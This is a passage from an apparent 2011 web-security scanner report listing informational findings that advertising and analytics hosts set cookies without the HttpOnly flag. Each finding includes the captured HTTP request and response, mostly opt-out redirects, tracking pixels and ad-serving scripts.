Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:12:58 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...

16.115. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106950_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 817

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...

16.116. http://imp.fetchback.com/serve/fb/hover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/hover

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/hover?tid=68324&crid=34024&cb=57823158 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315103291_34024:68324:1:0:0_34021:68285:1:6006:6006_34024:68283:2:6240:6332_34024:68292:2:125128:125210_34023:68293:1:125841:125841; uid=1_1315103291_1314893682667:5756480826433243; kwd=1_1315103291; scg=1_1315103291; ppd=1_1315103291; act=1_1315103291

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315107104_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:31:44 GMT; Path=/
Set-Cookie: eng=1_1315107104_34024:0_75:2282; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:31:44 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:31:44 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

16.117. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285; uid=1_1315103291_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315106977_34024:68324:2:0:3686_34021:68285:1:9692:9692_34024:68283:2:9926:10018_34024:68292:2:128814:128896_34023:68293:1:129527:129527; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: uid=1_1315106977_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: kwd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: scg=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: ppd=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Set-Cookie: act=1_1315106977; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6022

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

16.118. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=170&g=001&j=j&s= HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtDK1qi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameHVYgoVRzYFWa0xsoQhRMLRCd0UM5gETtUIc2rJsgGnaQCHKkJX; TFF=eJxLtLKwqi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaHSCNPs1IjUnMSSVFxmo%252BuA%252BcKIRF8bkedrI2J9XQsAEUFntA%253D%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/json
Set-Cookie: BFF=eJxLtDKzqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaWeDVYgoVRzYFWa0xsoQhRMLRCd0UM5gETtXI5liCJMwN0A0xgQjDRWrJcgqJ1tYCAPQcUTc%253D; expires=Mon, 02-Jan-2012 03:08:47 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJxLtDI0sqouBpFKhgYmDgYWBg6WlpZGStaJVkCJTCtDayA2NzAHUgYwZi2GekOQemM09UbWEC6yPnO4NuJ0AGkDExwqTQ0wDU%252BNSM1JLEnFZbgpuntg%252FjAi0d9GBPxtYond40a4PY6hBWyXuYGDgYEh8W5DqCcpTiDaiI4TcwOiVNYCAIKnmg8%253D; expires=Mon, 02-Jan-2012 03:08:47 GMT; path=/; domain=.exelator.com
Date: Sun, 04 Sep 2011 03:08:47 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-5
Content-Length: 17

{"service": "on"}

16.119. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=104&g=280&absid=21051315103139790868608&j=0 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtDK2qi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWScS0GIKFUc2BVmtMVyiFrcMAGx9JaM%253D; TFF=eJxLtDK1qi62MjSyUjI0MHEwsDBwsLS0NFKyTrQysqrOtDK0BmJzA3MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwId7s1IjUnMSSVOLMrgUAc5lBWA%253D%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdjrEKAjEQBf8l%252FUF2k93NxkpU8BoLxVqS7AWsxUr8d%252BOBjd0r5jFTcsyvRw7ZXee924yF2XmgZBw5Yfdce1LB6rFpElKKpis3Htvj70ESLDEV8YASBAKKhaZLMei9hfLlALJ73u12QR%252FPh1UGlB1Q8BoBkEUB%252FT85n3arhLOrYUSQ0cTUcYq%252Bp6ko6tQqY01mrSwj7f0BAds11Q%253D%253D; expires=Mon, 02-Jan-2012 02:36:37 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkkEOgyAQRe%252FiCWYGYWDceIxuXbho0l27M969tCKxCMnYhQGS9%252BT%252FDJMQyvIUJOkQ%252BpEQxhACdcMkJMtdcIifYx8X2LfriccPbwqehu149DhrOiOu0P%252BQDJxId%252F73fJsf02vuGkazhb3Y2v7X2ipbbzdRVMCQOtmBtxeSJU07Dyrm4TwkklqZLNY6fD3Yt2e%252B7JDvwcLjrGmNfY5Qn3s12YFX38NZu5qMfC3Z9pIT7ys8tl6%252BKTzOms5Y31iYDNo%253D; expires=Mon, 02-Jan-2012 02:36:37 GMT; path=/; domain=.exelator.com
Location: http://msite.martiniadnetwork.com/data/index/ds/exelate/absid/21051315103139790868608/segments//
Content-Length: 0
Date: Sun, 04 Sep 2011 02:36:37 GMT
Server: HTTP server


16.120. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.3974934 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJw1i8ENgCAMAHdhAtsChfoy8aEDOEBtYQGfxt0lJv4ulzsVlPsSknDsa5gHoYSzRFPw6pOinRlgiObNoIPWnOLXjWPZ%252FiMxeclJeQJkYiBkJ6tNHXo30jA%252FL%252B9SHFw%253D; BFF=eJxLtLKwqi62MjSwUgoxNDAJcbC0tDRSss60MjQ3MLcGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdaGRri1WMKFUc2BlmtMbKEIUTC0QndFDOYBE7VyOZYgiTMDdANMYEIoys0M8Sq0MwQu0KERbVkeYVkZ%252BNwJHYnAQCc%252FGrs; TFF=eJydkTEOwyAMRe%252BSE3y7CAezcIyuDAyVuqVblLuXirapEiGZDsggvW%252F7iazkdV2UWCeCS5iRQgg8xays600p1iOQWvC5bieeXvzlwHNsz9%252BcfGO2RK1wHZLPvcu13POj9Hq7jgUPWvN%252F1my1fk8SJIDsm%252B380GYtZv4PwYiDpzGHnR9yaDGzgycTuT0BGeDKhw%253D%253D

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 01-Sep-2021 10:59:28 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Wed, 01-Sep-2021 10:59:28 GMT; path=/; domain=.exelator.com
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: xltl=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: BFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/
Set-Cookie: TFF=deleted; expires=Sat, 04-Sep-2010 10:59:27 GMT; path=/; domain=.exelator.com
Content-type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:28 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3


16.121. http://lvs.truehits.in.th/goggen.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lvs.truehits.in.th
Path:   /goggen.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /goggen.php?hc=s0028944&bv=0&rf=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news&test=TEST&web=5eCi%2bmWXtRl9zACMF608bw%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=2BAEE501.1&fp=s&fv=10.3%20r183&truehitspage=HOMEPAGE&truehitsurl=http%3a//www.bangkokpost.com/ HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: truehitsid=fMKhxT77; expires=Thu, 31-Dec-2037 17:00:00 GMT; path=/
Content-type: image/jpeg
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Connection: close
Date: Sun, 04 Sep 2011 02:25:06 GMT
Server: lighttpd
Content-Length: 91

GIF89a............333....!.......,..........,....=..l.....jzc].Vq.g..0....#.....w9........;

16.122. http://nai.btrll.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.6192102 HTTP/1.1
Host: nai.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:13:05 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/; domain=.btrll.com
Set-Cookie: BR_MBBV=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/
Set-Cookie: DRN1=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/; domain=.btrll.com
Set-Cookie: DRN1=deleted; expires=Sat, 04-Sep-2010 11:13:04 GMT; path=/
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /nai/verify?nocache=0.6192102
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.123. http://netspiderads2.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads.dll/getad?slotid=37608 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CAMPPTIME=42705%3D40790.3541812847%2C40272%3D40790.3541870718%2C46520%3D40790.3552880208; path=/; expires=Mon, 03 Sep 2012 08:31:36 GMT
Expires: Mon, 08 Dec 2008 03:01:36 GMT
Content-Type: text/html
Content-Length: 402

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0"><a href="http://netspiderads2.indiatimes.com/ads.dll/cl
...[SNIP]...

16.124. http://netspiderads2.indiatimes.com/ads.dll/getxmlad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /ads.dll/getxmlad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads.dll/getxmlad?slotid=36287&rettype=1 HTTP/1.1
Host: netspiderads2.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; GeoDetail=254%2C915%2C58141; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:59:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 08:29:35 GMT
Expires: Mon, 08 Dec 2008 02:59:35 GMT
Content-Type: text/html
Content-Length: 199

document.write('<script tagid="bf0cc1c2f091a8d9d248bd91c646fdfe" src="' + "http://amconf.videoegg.com/tagconf/current/bf0cc1c2f091a8d9d248bd91c646fdfe/config.js?" + Math.random() + '"></s'+'cript>');

16.125. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Sat, 04-Sep-2010 11:16:22 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Fri, 02-Sep-2016 11:16:23 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
